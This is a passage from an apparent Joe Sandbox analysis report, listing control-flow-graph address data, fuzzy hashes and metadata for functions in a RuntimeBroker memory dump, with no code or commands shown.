7ffd9b8b9a58 634->642 643 7ffd9b8bb4d0-7ffd9b8bb515 634->643 663 7ffd9b8bb405-7ffd9b8bb40a 640->663 664 7ffd9b8bb3fd-7ffd9b8bb402 640->664 641->640 642->651 643->642 659 7ffd9b8bb798-7ffd9b8bb7d4 650->659 660 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 650->660 654 7ffd9b8bb721-7ffd9b8bb72e 651->654 654->632 657 7ffd9b8bb5d7-7ffd9b8bb5e5 654->657 661 7ffd9b8bb5e7 657->661 662 7ffd9b8bb5ec-7ffd9b8bb646 657->662 669 7ffd9b8bb7d6-7ffd9b8bb7ed 659->669 670 7ffd9b8bb7f1-7ffd9b8bba58 659->670 680 7ffd9b8bbabb-7ffd9b8bbaef 660->680 681 7ffd9b8bbab4 660->681 661->662 675 7ffd9b8bb648-7ffd9b8bb670 662->675 676 7ffd9b8bb6b6-7ffd9b8bb6de 662->676 663->624 664->663 669->670 670->650 678 7ffd9b8bb677-7ffd9b8bb6b4 675->678 679 7ffd9b8bb672 675->679 682 7ffd9b8bb6e5-7ffd9b8bb70e 676->682 683 7ffd9b8bb6e0 676->683 692 7ffd9b8bb719-7ffd9b8bb71e 678->692 679->678 685 7ffd9b8bbb0f-7ffd9b8bbb35 680->685 686 7ffd9b8bbaf1-7ffd9b8bbafe 680->686 681->680 682->692 683->682 689 7ffd9b8bbb05-7ffd9b8bbb0d 686->689 690 7ffd9b8bbb00 686->690 689->685 690->689 692->654
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5572d4a7aa4f3eaeeb70052e3f068dfb934472e47cb11ea776ec8e228bf3c471
                                                                                                                                      • Instruction ID: 09810d65090abf2ccf91e373437d71cf8fab711f7f57fb5737a0f62f37d855ed
                                                                                                                                      • Opcode Fuzzy Hash: 5572d4a7aa4f3eaeeb70052e3f068dfb934472e47cb11ea776ec8e228bf3c471
                                                                                                                                      • Instruction Fuzzy Hash: 36E1DD70E0991D8FDBA8DF58C895AA9B7B1FF58300F1141E9D01DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8E8619 Relevance: .3, Instructions: 335COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8E3000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8e3000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fbe5b3c40f092f4cdf54885dcb12b826e6d3ee4d38936373e501ed9b4c0ba5dc
                                                                                                                                      • Instruction ID: 7b890cc83d14f3c24d1c927095189ab773dac3e827f0494ffebb45579a3a8995
                                                                                                                                      • Opcode Fuzzy Hash: fbe5b3c40f092f4cdf54885dcb12b826e6d3ee4d38936373e501ed9b4c0ba5dc
                                                                                                                                      • Instruction Fuzzy Hash: 00C13B70E1A65DCFDB6CEBA8D8646BDB7B1FF19301F1501B9D409A32A2CB386941CB41
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BAFFB Relevance: .3, Instructions: 324COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 761 7ffd9b8baffb-7ffd9b8baffd 762 7ffd9b8bb07a-7ffd9b8bb07c 761->762 763 7ffd9b8bafff-7ffd9b8bb011 761->763 765 7ffd9b8bb085-7ffd9b8bb09c 762->765 764 7ffd9b8bb0ff-7ffd9b8bb10b 763->764 766 7ffd9b8bb116-7ffd9b8bb128 764->766 767 7ffd9b8bb09e 765->767 768 7ffd9b8bb0a3-7ffd9b8bb0be 765->768 770 7ffd9b8bb12a-7ffd9b8bb13d 766->770 767->768 771 7ffd9b8bb0c0-7ffd9b8bb0cf 768->771 772 7ffd9b8bb061-7ffd9b8bb079 768->772 775 7ffd9b8bad54-7ffd9b8badd4 770->775 776 7ffd9b8bb143-7ffd9b8bb177 call 7ffd9b8bc00a 770->776 771->764 772->765 785 7ffd9b8badd6-7ffd9b8bade2 775->785 786 7ffd9b8bae04-7ffd9b8bae13 775->786 789 7ffd9b8bb179-7ffd9b8bb187 776->789 793 7ffd9b8bae2f-7ffd9b8bae39 785->793 794 7ffd9b8bade4-7ffd9b8badf9 785->794 787 7ffd9b8bae15 786->787 788 7ffd9b8bae1a-7ffd9b8bae29 786->788 787->788 791 7ffd9b8bae2b-7ffd9b8bae2c 788->791 792 7ffd9b8bae3e-7ffd9b8bae59 788->792 795 7ffd9b8bb192-7ffd9b8bb21b 789->795 791->793 796 7ffd9b8bae5b-7ffd9b8bae75 792->796 797 7ffd9b8bae79-7ffd9b8bb0dd 792->797 793->766 794->786 806 7ffd9b8bb2b3-7ffd9b8bb2d5 795->806 807 7ffd9b8bb221-7ffd9b8bb2aa 795->807 796->797 797->770 802 7ffd9b8bb0df-7ffd9b8bb0f4 797->802 802->764 810 7ffd9b8bb426-7ffd9b8bb4bc 806->810 811 7ffd9b8bb2db-7ffd9b8bb326 806->811 807->806 827 7ffd9b8bb2ac 807->827 830 7ffd9b8bb57f-7ffd9b8bb5c5 810->830 831 7ffd9b8bb4c2-7ffd9b8bb4ce 810->831 821 7ffd9b8bb40d-7ffd9b8bb41a 811->821 823 7ffd9b8bb32b-7ffd9b8bb339 821->823 824 7ffd9b8bb420-7ffd9b8bb421 821->824 825 7ffd9b8bb33b 823->825 826 7ffd9b8bb340-7ffd9b8bb3a2 823->826 829 7ffd9b8bb734-7ffd9b8bb793 824->829 825->826 837 7ffd9b8bb3a9-7ffd9b8bb3fb 826->837 838 7ffd9b8bb3a4 826->838 827->806 847 7ffd9b8bba5b-7ffd9b8bba88 829->847 848 7ffd9b8bb5cc-7ffd9b8bb5d2 830->848 839 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 831->839 840 7ffd9b8bb4d0-7ffd9b8bb515 831->840 860 7ffd9b8bb405-7ffd9b8bb40a 837->860 861 7ffd9b8bb3fd-7ffd9b8bb402 837->861 838->837 839->848 840->839 856 7ffd9b8bb798-7ffd9b8bb7d4 847->856 857 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 847->857 851 7ffd9b8bb721-7ffd9b8bb72e 848->851 851->829 854 7ffd9b8bb5d7-7ffd9b8bb5e5 851->854 858 7ffd9b8bb5e7 854->858 859 7ffd9b8bb5ec-7ffd9b8bb646 854->859 866 7ffd9b8bb7d6-7ffd9b8bb7ed 856->866 867 7ffd9b8bb7f1-7ffd9b8bba58 856->867 877 7ffd9b8bbabb-7ffd9b8bbaef 857->877 878 7ffd9b8bbab4 857->878 858->859 872 7ffd9b8bb648-7ffd9b8bb670 859->872 873 7ffd9b8bb6b6-7ffd9b8bb6de 859->873 860->821 861->860 866->867 867->847 875 7ffd9b8bb677-7ffd9b8bb6b4 872->875 876 7ffd9b8bb672 872->876 879 7ffd9b8bb6e5-7ffd9b8bb70e 873->879 880 7ffd9b8bb6e0 873->880 889 7ffd9b8bb719-7ffd9b8bb71e 875->889 876->875 882 7ffd9b8bbb0f-7ffd9b8bbb35 877->882 883 7ffd9b8bbaf1-7ffd9b8bbafe 877->883 878->877 879->889 880->879 886 7ffd9b8bbb05-7ffd9b8bbb0d 883->886 887 7ffd9b8bbb00 883->887 886->882 887->886 889->851
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4e35934ab037f95491956fe55b20166436a26694a3ac1a8ea2b2a596e037d4aa
                                                                                                                                      • Instruction ID: dc203a309906543831a7887b2d249e21bc3eb8c050f3eb9b345a7bb8d2ccaa02
                                                                                                                                      • Opcode Fuzzy Hash: 4e35934ab037f95491956fe55b20166436a26694a3ac1a8ea2b2a596e037d4aa
                                                                                                                                      • Instruction Fuzzy Hash: 84D1DE70E0991D8FDBA8DF58C895AA9B7B1FF58300F1141E9D01DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BB016 Relevance: .3, Instructions: 321COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 891 7ffd9b8bb016-7ffd9b8bb05f 895 7ffd9b8bb0b8-7ffd9b8bb0be 891->895 896 7ffd9b8bb0c0-7ffd9b8bb0cf 895->896 897 7ffd9b8bb061-7ffd9b8bb09c 895->897 898 7ffd9b8bb0ff-7ffd9b8bb10b 896->898 900 7ffd9b8bb09e 897->900 901 7ffd9b8bb0a3-7ffd9b8bb0b5 897->901 902 7ffd9b8bb116-7ffd9b8bb128 898->902 900->901 901->895 903 7ffd9b8bb12a-7ffd9b8bb13d 902->903 906 7ffd9b8bad54-7ffd9b8badd4 903->906 907 7ffd9b8bb143-7ffd9b8bb177 call 7ffd9b8bc00a 903->907 916 7ffd9b8badd6-7ffd9b8bade2 906->916 917 7ffd9b8bae04-7ffd9b8bae13 906->917 920 7ffd9b8bb179-7ffd9b8bb187 907->920 924 7ffd9b8bae2f-7ffd9b8bae39 916->924 925 7ffd9b8bade4-7ffd9b8badf9 916->925 918 7ffd9b8bae15 917->918 919 7ffd9b8bae1a-7ffd9b8bae29 917->919 918->919 922 7ffd9b8bae2b-7ffd9b8bae2c 919->922 923 7ffd9b8bae3e-7ffd9b8bae59 919->923 926 7ffd9b8bb192-7ffd9b8bb21b 920->926 922->924 927 7ffd9b8bae5b-7ffd9b8bae75 923->927 928 7ffd9b8bae79-7ffd9b8bb0dd 923->928 924->902 925->917 937 7ffd9b8bb2b3-7ffd9b8bb2d5 926->937 938 7ffd9b8bb221-7ffd9b8bb2aa 926->938 927->928 928->903 933 7ffd9b8bb0df-7ffd9b8bb0f4 928->933 933->898 941 7ffd9b8bb426-7ffd9b8bb4bc 937->941 942 7ffd9b8bb2db-7ffd9b8bb326 937->942 938->937 958 7ffd9b8bb2ac 938->958 961 7ffd9b8bb57f-7ffd9b8bb5c5 941->961 962 7ffd9b8bb4c2-7ffd9b8bb4ce 941->962 952 7ffd9b8bb40d-7ffd9b8bb41a 942->952 954 7ffd9b8bb32b-7ffd9b8bb339 952->954 955 7ffd9b8bb420-7ffd9b8bb421 952->955 956 7ffd9b8bb33b 954->956 957 7ffd9b8bb340-7ffd9b8bb3a2 954->957 960 7ffd9b8bb734-7ffd9b8bb793 955->960 956->957 968 7ffd9b8bb3a9-7ffd9b8bb3fb 957->968 969 7ffd9b8bb3a4 957->969 958->937 978 7ffd9b8bba5b-7ffd9b8bba88 960->978 979 7ffd9b8bb5cc-7ffd9b8bb5d2 961->979 970 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 962->970 971 7ffd9b8bb4d0-7ffd9b8bb515 962->971 991 7ffd9b8bb405-7ffd9b8bb40a 968->991 992 7ffd9b8bb3fd-7ffd9b8bb402 968->992 969->968 970->979 971->970 987 7ffd9b8bb798-7ffd9b8bb7d4 978->987 988 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 978->988 982 7ffd9b8bb721-7ffd9b8bb72e 979->982 982->960 985 7ffd9b8bb5d7-7ffd9b8bb5e5 982->985 989 7ffd9b8bb5e7 985->989 990 7ffd9b8bb5ec-7ffd9b8bb646 985->990 997 7ffd9b8bb7d6-7ffd9b8bb7ed 987->997 998 7ffd9b8bb7f1-7ffd9b8bba58 987->998 1008 7ffd9b8bbabb-7ffd9b8bbaef 988->1008 1009 7ffd9b8bbab4 988->1009 989->990 1003 7ffd9b8bb648-7ffd9b8bb670 990->1003 1004 7ffd9b8bb6b6-7ffd9b8bb6de 990->1004 991->952 992->991 997->998 998->978 1006 7ffd9b8bb677-7ffd9b8bb6b4 1003->1006 1007 7ffd9b8bb672 1003->1007 1010 7ffd9b8bb6e5-7ffd9b8bb70e 1004->1010 1011 7ffd9b8bb6e0 1004->1011 1020 7ffd9b8bb719-7ffd9b8bb71e 1006->1020 1007->1006 1013 7ffd9b8bbb0f-7ffd9b8bbb35 1008->1013 1014 7ffd9b8bbaf1-7ffd9b8bbafe 1008->1014 1009->1008 1010->1020 1011->1010 1017 7ffd9b8bbb05-7ffd9b8bbb0d 1014->1017 1018 7ffd9b8bbb00 1014->1018 1017->1013 1018->1017 1020->982
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 5a59d1e512ea826d681174ba97faa5fd8fb89184a512c7b26e1c750e75ae10c1
                                                                                                                                      • Instruction ID: 01cb142594a812944bc1bda3f6abfa1b1199c8bdd5f69e1501038a132983031d
                                                                                                                                      • Opcode Fuzzy Hash: 5a59d1e512ea826d681174ba97faa5fd8fb89184a512c7b26e1c750e75ae10c1
                                                                                                                                      • Instruction Fuzzy Hash: 80C1DD70E0991D8FDBA8DF58C895BA9B7B1FF58300F1141B9D00DE72A5DA35AA81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BACC3 Relevance: .3, Instructions: 317COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1022 7ffd9b8bacc3-7ffd9b8bad4f 1031 7ffd9b8bb137-7ffd9b8bb13d 1022->1031 1032 7ffd9b8bad54-7ffd9b8badd4 1031->1032 1033 7ffd9b8bb143-7ffd9b8bb187 call 7ffd9b8bc00a 1031->1033 1042 7ffd9b8badd6-7ffd9b8bade2 1032->1042 1043 7ffd9b8bae04-7ffd9b8bae13 1032->1043 1052 7ffd9b8bb192-7ffd9b8bb21b 1033->1052 1050 7ffd9b8bae2f-7ffd9b8bae39 1042->1050 1051 7ffd9b8bade4-7ffd9b8badf9 1042->1051 1044 7ffd9b8bae15 1043->1044 1045 7ffd9b8bae1a-7ffd9b8bae29 1043->1045 1044->1045 1048 7ffd9b8bae2b-7ffd9b8bae2c 1045->1048 1049 7ffd9b8bae3e-7ffd9b8bae59 1045->1049 1048->1050 1054 7ffd9b8bae5b-7ffd9b8bae75 1049->1054 1055 7ffd9b8bae79-7ffd9b8bb0dd 1049->1055 1053 7ffd9b8bb116-7ffd9b8bb128 1050->1053 1051->1043 1066 7ffd9b8bb2b3-7ffd9b8bb2d5 1052->1066 1067 7ffd9b8bb221-7ffd9b8bb2aa 1052->1067 1056 7ffd9b8bb12a-7ffd9b8bb134 1053->1056 1054->1055 1055->1056 1062 7ffd9b8bb0df-7ffd9b8bb10b 1055->1062 1056->1031 1062->1053 1071 7ffd9b8bb426-7ffd9b8bb4bc 1066->1071 1072 7ffd9b8bb2db-7ffd9b8bb326 1066->1072 1067->1066 1088 7ffd9b8bb2ac 1067->1088 1091 7ffd9b8bb57f-7ffd9b8bb5c5 1071->1091 1092 7ffd9b8bb4c2-7ffd9b8bb4ce 1071->1092 1082 7ffd9b8bb40d-7ffd9b8bb41a 1072->1082 1084 7ffd9b8bb32b-7ffd9b8bb339 1082->1084 1085 7ffd9b8bb420-7ffd9b8bb421 1082->1085 1086 7ffd9b8bb33b 1084->1086 1087 7ffd9b8bb340-7ffd9b8bb3a2 1084->1087 1090 7ffd9b8bb734-7ffd9b8bb793 1085->1090 1086->1087 1098 7ffd9b8bb3a9-7ffd9b8bb3fb 1087->1098 1099 7ffd9b8bb3a4 1087->1099 1088->1066 1108 7ffd9b8bba5b-7ffd9b8bba88 1090->1108 1109 7ffd9b8bb5cc-7ffd9b8bb5d2 1091->1109 1100 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 1092->1100 1101 7ffd9b8bb4d0-7ffd9b8bb515 1092->1101 1121 7ffd9b8bb405-7ffd9b8bb40a 1098->1121 1122 7ffd9b8bb3fd-7ffd9b8bb402 1098->1122 1099->1098 1100->1109 1101->1100 1117 7ffd9b8bb798-7ffd9b8bb7d4 1108->1117 1118 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 1108->1118 1112 7ffd9b8bb721-7ffd9b8bb72e 1109->1112 1112->1090 1115 7ffd9b8bb5d7-7ffd9b8bb5e5 1112->1115 1119 7ffd9b8bb5e7 1115->1119 1120 7ffd9b8bb5ec-7ffd9b8bb646 1115->1120 1127 7ffd9b8bb7d6-7ffd9b8bb7ed 1117->1127 1128 7ffd9b8bb7f1-7ffd9b8bba58 1117->1128 1138 7ffd9b8bbabb-7ffd9b8bbaef 1118->1138 1139 7ffd9b8bbab4 1118->1139 1119->1120 1133 7ffd9b8bb648-7ffd9b8bb670 1120->1133 1134 7ffd9b8bb6b6-7ffd9b8bb6de 1120->1134 1121->1082 1122->1121 1127->1128 1128->1108 1136 7ffd9b8bb677-7ffd9b8bb6b4 1133->1136 1137 7ffd9b8bb672 1133->1137 1140 7ffd9b8bb6e5-7ffd9b8bb70e 1134->1140 1141 7ffd9b8bb6e0 1134->1141 1150 7ffd9b8bb719-7ffd9b8bb71e 1136->1150 1137->1136 1143 7ffd9b8bbb0f-7ffd9b8bbb35 1138->1143 1144 7ffd9b8bbaf1-7ffd9b8bbafe 1138->1144 1139->1138 1140->1150 1141->1140 1147 7ffd9b8bbb05-7ffd9b8bbb0d 1144->1147 1148 7ffd9b8bbb00 1144->1148 1147->1143 1148->1147 1150->1112
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f30676f6b3e91590f21a435c7acecba71729a510de9d8973564ac5e5e9fee989
                                                                                                                                      • Instruction ID: a73c5e2554ff922ee02125fa3e391d7efbbe34572aa8226cd2003d5212b96abf
                                                                                                                                      • Opcode Fuzzy Hash: f30676f6b3e91590f21a435c7acecba71729a510de9d8973564ac5e5e9fee989
                                                                                                                                      • Instruction Fuzzy Hash: 4CC1DD70A0991D8FDBA8DB58C895BA9B3B1FF98301F5141F9D00DD72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BAF04 Relevance: .3, Instructions: 303COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1152 7ffd9b8baf04-7ffd9b8baf31 1154 7ffd9b8bb0ff-7ffd9b8bb10b 1152->1154 1155 7ffd9b8bb116-7ffd9b8bb128 1154->1155 1156 7ffd9b8bb12a-7ffd9b8bb13d 1155->1156 1159 7ffd9b8bad54-7ffd9b8badd4 1156->1159 1160 7ffd9b8bb143-7ffd9b8bb177 call 7ffd9b8bc00a 1156->1160 1169 7ffd9b8badd6-7ffd9b8bade2 1159->1169 1170 7ffd9b8bae04-7ffd9b8bae13 1159->1170 1173 7ffd9b8bb179-7ffd9b8bb187 1160->1173 1177 7ffd9b8bae2f-7ffd9b8bae39 1169->1177 1178 7ffd9b8bade4-7ffd9b8badf9 1169->1178 1171 7ffd9b8bae15 1170->1171 1172 7ffd9b8bae1a-7ffd9b8bae29 1170->1172 1171->1172 1175 7ffd9b8bae2b-7ffd9b8bae2c 1172->1175 1176 7ffd9b8bae3e-7ffd9b8bae59 1172->1176 1179 7ffd9b8bb192-7ffd9b8bb21b 1173->1179 1175->1177 1180 7ffd9b8bae5b-7ffd9b8bae75 1176->1180 1181 7ffd9b8bae79-7ffd9b8bb0dd 1176->1181 1177->1155 1178->1170 1190 7ffd9b8bb2b3-7ffd9b8bb2d5 1179->1190 1191 7ffd9b8bb221-7ffd9b8bb2aa 1179->1191 1180->1181 1181->1156 1186 7ffd9b8bb0df-7ffd9b8bb0f4 1181->1186 1186->1154 1194 7ffd9b8bb426-7ffd9b8bb4bc 1190->1194 1195 7ffd9b8bb2db-7ffd9b8bb326 1190->1195 1191->1190 1211 7ffd9b8bb2ac 1191->1211 1214 7ffd9b8bb57f-7ffd9b8bb5c5 1194->1214 1215 7ffd9b8bb4c2-7ffd9b8bb4ce 1194->1215 1205 7ffd9b8bb40d-7ffd9b8bb41a 1195->1205 1207 7ffd9b8bb32b-7ffd9b8bb339 1205->1207 1208 7ffd9b8bb420-7ffd9b8bb421 1205->1208 1209 7ffd9b8bb33b 1207->1209 1210 7ffd9b8bb340-7ffd9b8bb3a2 1207->1210 1213 7ffd9b8bb734-7ffd9b8bb793 1208->1213 1209->1210 1221 7ffd9b8bb3a9-7ffd9b8bb3fb 1210->1221 1222 7ffd9b8bb3a4 1210->1222 1211->1190 1231 7ffd9b8bba5b-7ffd9b8bba88 1213->1231 1232 7ffd9b8bb5cc-7ffd9b8bb5d2 1214->1232 1223 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 1215->1223 1224 7ffd9b8bb4d0-7ffd9b8bb515 1215->1224 1244 7ffd9b8bb405-7ffd9b8bb40a 1221->1244 1245 7ffd9b8bb3fd-7ffd9b8bb402 1221->1245 1222->1221 1223->1232 1224->1223 1240 7ffd9b8bb798-7ffd9b8bb7d4 1231->1240 1241 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 1231->1241 1235 7ffd9b8bb721-7ffd9b8bb72e 1232->1235 1235->1213 1238 7ffd9b8bb5d7-7ffd9b8bb5e5 1235->1238 1242 7ffd9b8bb5e7 1238->1242 1243 7ffd9b8bb5ec-7ffd9b8bb646 1238->1243 1250 7ffd9b8bb7d6-7ffd9b8bb7ed 1240->1250 1251 7ffd9b8bb7f1-7ffd9b8bba58 1240->1251 1261 7ffd9b8bbabb-7ffd9b8bbaef 1241->1261 1262 7ffd9b8bbab4 1241->1262 1242->1243 1256 7ffd9b8bb648-7ffd9b8bb670 1243->1256 1257 7ffd9b8bb6b6-7ffd9b8bb6de 1243->1257 1244->1205 1245->1244 1250->1251 1251->1231 1259 7ffd9b8bb677-7ffd9b8bb6b4 1256->1259 1260 7ffd9b8bb672 1256->1260 1263 7ffd9b8bb6e5-7ffd9b8bb70e 1257->1263 1264 7ffd9b8bb6e0 1257->1264 1273 7ffd9b8bb719-7ffd9b8bb71e 1259->1273 1260->1259 1266 7ffd9b8bbb0f-7ffd9b8bbb35 1261->1266 1267 7ffd9b8bbaf1-7ffd9b8bbafe 1261->1267 1262->1261 1263->1273 1264->1263 1270 7ffd9b8bbb05-7ffd9b8bbb0d 1267->1270 1271 7ffd9b8bbb00 1267->1271 1270->1266 1271->1270 1273->1235
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2823293755.00007FFD9B8B9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B9000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_7ffd9b8b9000_RuntimeBroker.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 0c3e4651120af85176e2788db5fbc8fedece54b7ee2c4bc2801a08d924dc9ca9
                                                                                                                                      • Instruction ID: 71583c43ec74e4f535e22d86e692e73d8255f1bfe90bf6b21e3ba3e6a5711393
                                                                                                                                      • Opcode Fuzzy Hash: 0c3e4651120af85176e2788db5fbc8fedece54b7ee2c4bc2801a08d924dc9ca9
                                                                                                                                      • Instruction Fuzzy Hash: 01C1CC70A0991D8FDBA8DF58C895BA9B3B1FF58305F1141E9D00DE72A5DA35AE81CF80
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Function 00007FFD9B8BAE9C Relevance: .3, Instructions: 301COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1275 7ffd9b8bae9c-7ffd9b8baec7 1277 7ffd9b8bb0ff-7ffd9b8bb10b 1275->1277 1278 7ffd9b8bb116-7ffd9b8bb128 1277->1278 1279 7ffd9b8bb12a-7ffd9b8bb13d 1278->1279 1282 7ffd9b8bad54-7ffd9b8badd4 1279->1282 1283 7ffd9b8bb143-7ffd9b8bb177 call 7ffd9b8bc00a 1279->1283 1292 7ffd9b8badd6-7ffd9b8bade2 1282->1292 1293 7ffd9b8bae04-7ffd9b8bae13 1282->1293 1296 7ffd9b8bb179-7ffd9b8bb187 1283->1296 1300 7ffd9b8bae2f-7ffd9b8bae39 1292->1300 1301 7ffd9b8bade4-7ffd9b8badf9 1292->1301 1294 7ffd9b8bae15 1293->1294 1295 7ffd9b8bae1a-7ffd9b8bae29 1293->1295 1294->1295 1298 7ffd9b8bae2b-7ffd9b8bae2c 1295->1298 1299 7ffd9b8bae3e-7ffd9b8bae59 1295->1299 1302 7ffd9b8bb192-7ffd9b8bb21b 1296->1302 1298->1300 1303 7ffd9b8bae5b-7ffd9b8bae75 1299->1303 1304 7ffd9b8bae79-7ffd9b8bb0dd 1299->1304 1300->1278 1301->1293 1313 7ffd9b8bb2b3-7ffd9b8bb2d5 1302->1313 1314 7ffd9b8bb221-7ffd9b8bb2aa 1302->1314 1303->1304 1304->1279 1309 7ffd9b8bb0df-7ffd9b8bb0f4 1304->1309 1309->1277 1317 7ffd9b8bb426-7ffd9b8bb4bc 1313->1317 1318 7ffd9b8bb2db-7ffd9b8bb326 1313->1318 1314->1313 1334 7ffd9b8bb2ac 1314->1334 1337 7ffd9b8bb57f-7ffd9b8bb5c5 1317->1337 1338 7ffd9b8bb4c2-7ffd9b8bb4ce 1317->1338 1328 7ffd9b8bb40d-7ffd9b8bb41a 1318->1328 1330 7ffd9b8bb32b-7ffd9b8bb339 1328->1330 1331 7ffd9b8bb420-7ffd9b8bb421 1328->1331 1332 7ffd9b8bb33b 1330->1332 1333 7ffd9b8bb340-7ffd9b8bb3a2 1330->1333 1336 7ffd9b8bb734-7ffd9b8bb793 1331->1336 1332->1333 1344 7ffd9b8bb3a9-7ffd9b8bb3fb 1333->1344 1345 7ffd9b8bb3a4 1333->1345 1334->1313 1354 7ffd9b8bba5b-7ffd9b8bba88 1336->1354 1355 7ffd9b8bb5cc-7ffd9b8bb5d2 1337->1355 1346 7ffd9b8bb51b-7ffd9b8bb57d call 7ffd9b8b9a58 1338->1346 1347 7ffd9b8bb4d0-7ffd9b8bb515 1338->1347 1367 7ffd9b8bb405-7ffd9b8bb40a 1344->1367 1368 7ffd9b8bb3fd-7ffd9b8bb402 1344->1368 1345->1344 1346->1355 1347->1346 1363 7ffd9b8bb798-7ffd9b8bb7d4 1354->1363 1364 7ffd9b8bba8e-7ffd9b8bbab2 call 7ffd9b8bc043 1354->1364 1358 7ffd9b8bb721-7ffd9b8bb72e 1355->1358 1358->1336 1361 7ffd9b8bb5d7-7ffd9b8bb5e5 1358->1361 1365 7ffd9b8bb5e7 1361->1365 1366 7ffd9b8bb5ec-7ffd9b8bb646 1361->1366 1373 7ffd9b8bb7d6-7ffd9b8bb7ed 1363->1373 1374 7ffd9b8bb7f1-7ffd9b8bba58 1363->1374 1384 7ffd9b8bbabb-7ffd9b8bbaef 1364->1384 1385 7ffd9b8bbab4 1364->1385 1365->1366 1379 7ffd9b8bb648-7ffd9b8bb670 1366->1379 1380 7ffd9b8bb6b6-7ffd9b8bb6de 1366->1380 1367->1328 1368->1367 1373->1374 1374->1354 1382 7ffd9b8bb677-7ffd9b8bb6b4 1379->1382 1383 7ffd9b8bb672 1379->1383 1386 7ffd9b8bb6e5-7ffd9b8bb70e 1380->1386 1387 7ffd9b8bb6e0 1380->1387 1396 7ffd9b8bb719-7ffd9b8bb71e 1382->1396 1383->1382 1389 7ffd9b8bbb0f-7ffd9b8bbb35 1384->1389 1390 